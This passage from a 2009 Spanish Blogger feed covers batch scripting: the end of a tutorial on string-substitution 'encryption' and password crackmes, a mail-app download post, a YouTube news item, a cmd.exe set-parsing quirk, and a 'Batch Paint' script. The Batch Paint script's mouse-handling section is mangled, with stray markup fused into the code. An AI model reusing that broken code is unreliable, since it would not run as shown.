/&gt;&lt;span style="color:limeGreen;"&gt;caracter_reemplazado&lt;span style="text-decoration: underline;"&gt;r&lt;/span&gt;&lt;/span&gt; = 4 (cambiamos los cuatros..)&lt;br /&gt;&lt;span style="color:red;"&gt;=&lt;/span&gt; = Indica que se va a reemplazar&lt;br /&gt;&lt;span style="color:limeGreen;"&gt;caracter_reemplazado&lt;/span&gt; = a (..por as)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:78%;" &gt;&lt;span style="text-decoration: underline;"&gt;Los verdes son los campos reemplazables&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, con esta tecnica se juega mas cambiando el valor de la variable, por ejemplo que la variable &lt;b&gt;alg&lt;/b&gt; de valor &lt;b&gt;H4ckBl4ck&lt;/b&gt; se quede &lt;b&gt;HackBlack&lt;/b&gt; (aunque no la mostremos).&lt;br /&gt;&lt;br /&gt;Cambiando la variable (o creando otra) podemos cambiar varios caracteres, como veremos en el siguiente ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=x4ss1z&lt;br /&gt;set alg2=%alg:4=a%&lt;br /&gt;set alg2=%alg2:1=i%&lt;br /&gt;echo.De %alg% a %alg2%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que mostraria primero &lt;b&gt;x4ss1z&lt;/b&gt; y despues &lt;b&gt;xassiz&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Con esto podriamos crear un "encriptador":&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set/p palabra="Palabra&gt;&gt; "&lt;br /&gt;set alg=%palabra:x=123%&lt;br /&gt;set alg=%alg:a=234%&lt;br /&gt;set alg=%alg:s=345%&lt;br /&gt;set alg=%alg:i=456%&lt;br /&gt;set alg=%alg:z=567%&lt;br /&gt;cls&lt;br /&gt;echo."%palabra%" encriptado =  %alg%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que si en donde nos pide la palabra escribimos &lt;b&gt;xassiz&lt;/b&gt;, nos devolveria:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;"xassiz" encriptado =  123234345345456567&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;El programa de la contraseña podriamos hacerlo asi:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=xzsasi&lt;br /&gt;set alg=%alg:a=4%&lt;br /&gt;set alg=%alg:i=1%&lt;br /&gt;set/p pass="Password: "&lt;br /&gt;if "%pass%"=="%alg:~0,1%%alg:~3,1%%alg:~2,1%%alg:~4,1%%alg:~-1%%alg:~1,1%" (echo.Bien) else (echo.Mal)&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que para que nos diera correcto tendriamos que cambiar las &lt;b&gt;a&lt;/b&gt; por &lt;b&gt;4&lt;/b&gt; y las &lt;b&gt;i&lt;/b&gt; por &lt;b&gt;1&lt;/b&gt;:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;Password: x4ss1z&lt;br /&gt;Bien&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:yellow;"&gt;5. Parametros&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Bueno, esto se utiliza mas bien para las llamadas Funciones, pero tambien se utiliza bastante en los virus para ahorrar lineas, o tambien en los crackmes!&lt;br /&gt;&lt;br /&gt;Vamos a poner un ejemplo sencillito para ver como se utilizan:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set/p palab="Palabra&gt;&gt; "&lt;br /&gt;call :alg %palab%&lt;br /&gt;echo."%palab%" encriptado = %par%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;:alg&lt;br /&gt;set par=%1&lt;br /&gt;set alg=%par:x=123%&lt;br /&gt;set alg=%alg:a=234%&lt;br /&gt;set alg=%alg:s=345%&lt;br /&gt;set alg=%alg:i=456%&lt;br /&gt;set alg=%alg:z=567%&lt;br /&gt;goto:eof&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que seria exactamente igual que el encriptador de antes. La gente que no sepa usar parametros le va ser imposible de sacar y a la que los sabe utilizar le va ser mas complicado que de la otra manera, pero mas adelante veremos un ejemplo mejor.&lt;br /&gt;&lt;br /&gt;Analizando el codigo vemos lo que pasa:&lt;br /&gt;-Primero preguntamos el valor de la variable &lt;b&gt;%palab%&lt;/b&gt;.&lt;br /&gt;-Ahora llamamos a la etiqueta &lt;b&gt;:alg&lt;/b&gt; con call pasandole como primer parametro la palabra que escribiera el user:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;call :alg %palab%&lt;/code&gt;&lt;/div&gt;Hasta ahi sencillo no? Pues ahora llegan los parametros.&lt;br /&gt;-Seteamos la variable &lt;b&gt;par&lt;/b&gt; como &lt;b&gt;%1&lt;/b&gt;. Eso es un parametro, el parametro &lt;b&gt;1&lt;/b&gt;. Los parametros son numeros, en este caso es el primer parametro. Es como una variable, cual sera su valor? pues lo que vaya despues de &lt;b&gt;call+:etiqueta&lt;/b&gt;, que en este caso es otra variable, &lt;b&gt;%palab%&lt;/b&gt;.&lt;br /&gt;Entonces si el user escribiera &lt;b&gt;xassiz&lt;/b&gt; seria como si hiciesemos:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;set par=xassiz&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;A partir de ahi se van reemplazando los caracteres.. hacemos un &lt;b&gt;goto:eof&lt;/b&gt; para salir de la etiqueta y el programa vuelve a la linea siguiente al &lt;b&gt;call&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Pondre un ejemplo mas facil:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;call :alg en Registrate Www.HackBlack.neT&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;:alg&lt;br /&gt;echo.%2 %1 %3&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que mostraria "&lt;b&gt;Registrate en Www.HackBlack.neT&lt;/b&gt;".&lt;br /&gt;- Porque no mostraria "&lt;b&gt;en Registrate Www.HackBlack.neT&lt;/b&gt;"?&lt;br /&gt;- Facil. Cuando usamos los parametros no ponemos:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;echo.%1 %2 %3&lt;/code&gt;&lt;/div&gt;sino que ponemos:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;%2 %1 %3&lt;/code&gt;&lt;/div&gt;ordenando las palabras.&lt;br /&gt;&lt;br /&gt;Tambien te preguntaras por que no puse &lt;b&gt;goto:eof&lt;/b&gt; para salir de la etiqueta.. pues es solo para demostrar una curiosidad, que es que si cuando se acaba la etiqueta no hay mas codigo delante, no haría falta ponerlo. Por lo que si el code fuera asi no valdria:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;call :alg en Registrate Www.HackBlack.neT&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;:alg&lt;br /&gt;echo.%2 %1 %3&lt;br /&gt;:nada&lt;br /&gt;cls&lt;br /&gt;echo.Esto se vera porque el code sigue despues de la etiqueta :alg&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Ahora os mostrare el programa de contraseña mezclando todo lo que vimos hasta aqui en el tutorial:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set echo=set alg2&lt;br /&gt;set alg=xassiz&lt;br /&gt;set/p pass="Password: "&lt;br /&gt;call :alg %alg%&lt;br /&gt;if "%pass%"=="%alg2%" (echo.Bien) else (echo.Mal)&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;:alg&lt;br /&gt;%echo%=%1&lt;br /&gt;%echo%=%alg2:a=4%&lt;br /&gt;%echo%=%alg2:i=1%&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;La contraseña es &lt;b&gt;x4ss1z&lt;/b&gt;, que si seguiste el tutorial supongo que sabrias ^^&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:yellow;"&gt;6. Despedida&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Despues de todo este rollo espero que aprendierais.. xD&lt;br /&gt;&lt;br /&gt;O sino a leerlo otra vez! Para que os quede probad los codes y cread los vuestros =P&lt;br /&gt;&lt;br /&gt;Espero que os gustara..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos!  &lt;img src="http://www.hackblack.net/foro/Smileys/default/smiley.gif" alt="Sonrisa" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="quote"&gt;&lt;blockquote&gt;ATENCION: si vas a copiar este tutorial menciona autor (xassiz) y fuente (Www.HackBlack.neT), y no lo modifiques&lt;/blockquote&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-9218211405773377366?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/9218211405773377366/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/10/encriptacion-y-crackmes-en-batch-by.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/9218211405773377366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/9218211405773377366'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/10/encriptacion-y-crackmes-en-batch-by.html' title='&quot;Encriptacion y crackmes en Batch&quot; - by xassi'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-7536057189703156255</id><published>2009-10-10T10:44:00.000-07:00</published><updated>2009-10-10T10:49:11.403-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSendMails'/><category scheme='http://www.blogger.com/atom/ns#' term='Visual Basic'/><category scheme='http://www.blogger.com/atom/ns#' term='Gmail'/><title type='text'>XSendMails    -    by xassiz</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(51, 255, 51);font-size:180%;" &gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;XSendMails    -    by xassiz&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Bueno, hoy os traigo esta aplicación que hice en VB6, con la cual pueden mandar correos.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Espero que os guste:&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://xasscapturas.webcindario.com/Aplicaciones/XSendMails.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 360px; height: 549px;" src="http://xasscapturas.webcindario.com/Aplicaciones/XSendMails.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="http://downxassiz.webcindario.com/XSendMails_by_xassiz.rar"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);font-family:verdana;" &gt;Descargar Aplicación&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="color: rgb(255, 255, 0);" href="http://downxassiz.webcindario.com/XSendMails_Proyect_by_xassiz.rar"&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;Descargar Proyecto&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;Password: xassiz&lt;/code&gt;&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-7536057189703156255?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/7536057189703156255/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/10/xsendmails-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/7536057189703156255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/7536057189703156255'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/10/xsendmails-by-xassiz.html' title='XSendMails    -    by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-5165662989950168104</id><published>2009-10-10T10:42:00.000-07:00</published><updated>2009-10-10T10:43:31.145-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><category scheme='http://www.blogger.com/atom/ns#' term='Youtube'/><title type='text'>YouTube: tres años con Google, 1.000 millones de videos diario</title><content type='html'>&lt;span style="font-family: verdana;"&gt;YouTube celebra el tercer cumpleaños bajo el manto del gigante de Internet, incluyendo en su logotipo una reseña a los más de 1.000 millones de videos servidos de media diariamente. Además, el portal de videos es ya la segunda página web mundial por accesos, sólo superado por “papa” Google.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Se cumplen tres años tras la adquisición de YouTube - por la que Google desembolsó 1.650 millones de dólares- en medio del debate de si la cantidad pagada fue excesiva. Quizá sí, aunque el éxito del portal de videos es indudable y muestra de ello son los 1.000 millones de videos que se reproducen de media diaria en YouTube, con picos todavía más elevados en los últimos meses.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Chad Hurley, CEO y Co-fundador de la plataforma aprovechó el aniversario para subrayar que el aumento de uso del portal se debe a los avances de la banda ancha que han permitido conexiones más veloces y una reproducción en streaming sin interrupciones.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt; No obstante, Hurley explicó que a pesar de “seguir comprometidos con los mismos principios desde su creación, saben que las cosas han cambiado”, en referencia principalmente a la introducción de películas y series en YouTube. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt; &lt;span style="font-size:78%;"&gt;Fuente: theinquirer.es &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-5165662989950168104?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/5165662989950168104/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/10/youtube-tres-anos-con-google-1000.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5165662989950168104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5165662989950168104'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/10/youtube-tres-anos-con-google-1000.html' title='YouTube: tres años con Google, 1.000 millones de videos diario'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-2526776235010090388</id><published>2009-10-01T09:25:00.000-07:00</published><updated>2009-10-01T09:27:13.981-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='Set'/><category scheme='http://www.blogger.com/atom/ns#' term='Bugs'/><title type='text'>Bug en el comando set de batch</title><content type='html'>&lt;span style="font-family:verdana;"&gt;Descubierto por 0x0309:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Yo había leído en un sitio que para asignar con el comando set es lo mismo:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;set "variable=valor"&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;que&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;(set variable=valor)&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Sin embargo, he encontrado un bug de cmd.exe.&lt;br /&gt;&lt;br /&gt;Cuando cmd.exe reconoce una sola comilla dentro de paréntesis termina el archivo por lotes.&lt;br /&gt;&lt;br /&gt;Por eso si se hace:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;(")&lt;/pre&gt;&lt;/div&gt;el archivo por lotes termina.&lt;br /&gt;&lt;br /&gt;Por eso si tenemos el siguiene código:&lt;br /&gt;&lt;br /&gt;test.cmd&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;@echo off&lt;br /&gt;(set var=%1)&lt;br /&gt;echo.El texto se muestra.&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;y ejecutamos:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;test.cmd "&lt;/pre&gt;&lt;/div&gt;el texto no se muestra porque el archivo por lotes concluyó antes por el bug.&lt;br /&gt;&lt;br /&gt;Pero si hacemos:&lt;br /&gt;&lt;br /&gt;test.cmd&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;@echo off&lt;br /&gt;set "var=%1"&lt;br /&gt;echo.El texto se muestra.&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;el texto si es mostrado.&lt;br /&gt;&lt;br /&gt;Entonces no es lo mismo:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;(set variable=valor)&lt;/pre&gt;&lt;/div&gt;que contiene el bug.&lt;br /&gt;&lt;br /&gt;que:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;set "variable=valor"&lt;/pre&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-2526776235010090388?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/2526776235010090388/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/10/bug-set-en-batch.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/2526776235010090388'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/2526776235010090388'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/10/bug-set-en-batch.html' title='Bug en el comando set de batch'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-6776495397324929565</id><published>2009-09-29T07:51:00.000-07:00</published><updated>2009-09-29T07:54:14.814-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='Paint'/><title type='text'>[bat][vbs][deb] Batch Paint</title><content type='html'>&lt;span style="font-family:verdana;"&gt;&lt;br /&gt;Quien dijo que no se podia pintar en Batch?? :S&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img524.imageshack.us/img524/8360/batchpaint.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 388px; height: 259px;" src="http://img524.imageshack.us/img524/8360/batchpaint.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;@Echo Off&lt;br /&gt;@title Batch Paint&lt;br /&gt;@Mode Con cols=80 lines=25&lt;br /&gt;Setlocal Enabledelayedexpansion&lt;br /&gt;&lt;br /&gt;::A Program by S.C.O.T 2009&lt;br /&gt;::Script Coders Oriented Team&lt;br /&gt;::SmartGenius &amp;amp; 3D1&lt;br /&gt;&lt;br /&gt;:Init&lt;br /&gt;Cls&lt;br /&gt;If Not Exist Col.vbs (Call :Col_Deb &gt;&gt;Col.vbs)&lt;br /&gt;Set "X=0"&lt;br /&gt;Set "Y=0"&lt;br /&gt;Set "Color=11"&lt;br /&gt;Set "Pincel=Û"&lt;br /&gt;Call :Load&lt;br /&gt;&lt;br /&gt;:Table&lt;br /&gt;If "!X!-!Y!"=="43-2" (Exit)&lt;br /&gt;For /l %%s in (33,1,39) do (If "!X!-!Y!"=="%%s-2" (Goto :Save))&lt;br /&gt;If "!X!-!Y!"=="22-2" (Set "Pincel=°")&lt;br /&gt;If "!X!-!Y!"=="24-2" (Set "Pincel=±")&lt;br /&gt;If "!X!-!Y!"=="26-2" (Set "Pincel=²")&lt;br /&gt;If "!X!-!Y!"=="28-2" (Set "Pincel=Û")&lt;br /&gt;If "!X!-!Y!"=="3-4" (Set "Color=01")&lt;br /&gt;If "!X!-!Y!"=="5-4" (Set "Color=02")&lt;br /&gt;If "!X!-!Y!"=="7-4" (Set "Color=03")&lt;br /&gt;If "!X!-!Y!"=="3-6" (Set "Color=04")&lt;br /&gt;If "!X!-!Y!"=="5-6" (Set "Color=05")&lt;br /&gt;If "!X!-!Y!"=="7-6" (Set "Color=06")&lt;br /&gt;If "!X!-!Y!"=="3-8" (Set "Color=07")&lt;br /&gt;If "!X!-!Y!"=="5-8" (Set "Color=08")&lt;br /&gt;If "!X!-!Y!"=="7-8" (Set "Color=09")&lt;br /&gt;If "!X!-!Y!"=="3-10" (Set "Color=0A")&lt;br /&gt;If "!X!-!Y!"=="5-10" (Set "Color=0B")&lt;br /&gt;If "!X!-!Y!"=="7-10" (Set "Color=0C")&lt;br /&gt;If "!X!-!Y!"=="3-12" (Set "Color=0D")&lt;br /&gt;If "!X!-!Y!"=="5-12" (Set "Color=0E")&lt;br /&gt;If "!X!-!Y!"=="7-12" (Set "Color=0F")&lt;br /&gt;If !X! GEQ 12 (&lt;br /&gt;If !Y! GEQ 5 (&lt;br /&gt;If !X! LEQ 41 (&lt;br /&gt;If !Y! LEQ 15 (&lt;br /&gt;cscript //nologo col.vbs "!X!" "!Y!" "%Color%" "%Pincel%"&lt;br /&gt;Set /a "vX=!X!-12"&lt;br /&gt;Set /a "vY=!Y!-5"&lt;br /&gt;Set "X!vX!Y!vY!=!vX! !vY! %Color% %Pincel%"&lt;br /&gt;))))&lt;br /&gt;Call :Mouse&lt;br /&gt;Goto :Table&lt;br /&gt;&lt;br /&gt;:Load&lt;br /&gt;Echo.&lt;br /&gt;Echo. ÚÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÂÄ¿&lt;br /&gt;Echo. ³Colores³ Pinceles   ° ± ² Û   ³Guardar³ ³X³&lt;br /&gt;Echo. ³ÚÄÂÄÂÄ¿ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÁÄ´&lt;br /&gt;Echo. ³³Û³Û³Û³³ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³&lt;br /&gt;Echo. ³ÃÄÅÄÅÄ´³ º                              º ³&lt;br /&gt;Echo. ³³Û³Û³Û³³ º                              º ³&lt;br /&gt;Echo. ³ÃÄÅÄÅÄ´³ º                              º ³&lt;br /&gt;Echo. ³³Û³Û³Û³³ º                              º ³&lt;br /&gt;Echo. ³ÃÄÅÄÅÄ´³ º                              º ³&lt;br /&gt;Echo. ³³Û³Û³Û³³ º                              º ³&lt;br /&gt;Echo. ³ÃÄÅÄÅÄ´³ º                              º ³&lt;br /&gt;Echo. ³³Û³Û³Û³³ º                              º ³&lt;br /&gt;Echo. ³ÀÄÁÄÁÄÙ³ º                              º ³&lt;br /&gt;Echo. ÃÄÄÄÄÄÄÄ´ º                              º ³&lt;br /&gt;Echo. ³ SCOT  ³ º                              º ³&lt;br /&gt;Echo. ³  Team ³ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ³&lt;br /&gt;Echo. ÀÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ&lt;br /&gt;cscript //nologo col.vbs "3" "4" "11" " "&lt;br /&gt;cscript //nologo col.vbs "5" "4" "22" " "&lt;br /&gt;cscript //nologo col.vbs "7" "4" "33" " "&lt;br /&gt;cscript //nologo col.vbs "3" "6" "44" " "&lt;br /&gt;cscript //nologo col.vbs "5" "6" "55" " "&lt;br /&gt;cscript //nologo col.vbs "7" "6" "66" " "&lt;br /&gt;cscript //nologo col.vbs "3" "8" "77" " "&lt;br /&gt;cscript //nologo col.vbs "5" "8" "88" " "&lt;br /&gt;cscript //nologo col.vbs "7" "8" "99" " "&lt;br /&gt;cscript //nologo col.vbs "3" "10" "AA" " "&lt;br /&gt;cscript //nologo col.vbs "5" "10" "BB" " "&lt;br /&gt;cscript //nologo col.vbs "7" "10" "CC" " "&lt;br /&gt;cscript //nologo col.vbs "3" "12" "DD" " "&lt;br /&gt;cscript //nologo col.vbs "5" "12" "EE" " "&lt;br /&gt;cscript //nologo col.vbs "7" "12" "FF" " "&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;br /&gt;:Mouse&lt;br /&gt;Echo e100 B8 1 0'3'DB CD'3'B0 3'C'CD'3'B DB't'FA 91 D3 EA D3 E8 91 C3&gt;mouse.dat&lt;br /&gt;For %%! in (.g116 .q) do (Echo%%!&gt;&gt; mouse.dat)&lt;br /&gt;For /f "tokens=6-8 delims== " %%a in ('Debug ^&lt; x="0x%%a" y="0x%%c" v="  Introduzca"&gt;&gt; "&lt;nul set="" p="" filename=" If Not Defined Filename Set " call="" template=""&gt;&gt;%Filename%&lt;br /&gt;For /l %%a in (0,1,29) do (&lt;br /&gt;For /l %%b in (0,1,11) do (&lt;br /&gt;If Defined X%%aY%%b (Echo.Cscript //nologo col.vbs !X%%aY%%b! &gt;&gt;%Filename%)&lt;br /&gt;))&lt;br /&gt;Echo.Pause^&gt;nul &gt;&gt;%Filename%&lt;br /&gt;Echo.&gt;&gt;%Filename%&lt;br /&gt;Call :Col_Deb Echo. "^"&gt;&gt;%Filename%&lt;br /&gt;Echo.&lt;br /&gt;Echo. Archivo %Filename% Generado Exitosamente&lt;br /&gt;Ren %Filename% %Filename%.bat &gt;nul&lt;br /&gt;Echo.&lt;br /&gt;Set /p "V=  Presione Cualquier tecla para volver...."&lt;nul pause=""&gt;nul&lt;br /&gt;Goto :Init&lt;br /&gt;&lt;br /&gt;:Template&lt;br /&gt;Echo. @Echo off&lt;br /&gt;Echo. @Title Paint Batch - %Filename%&lt;br /&gt;Echo. @Mode Con Cols=80 Lines=25&lt;br /&gt;Echo. @::Hecho Con Batch Paint&lt;br /&gt;Echo. @::S.C.O.T Team 2009&lt;br /&gt;Echo.If Not 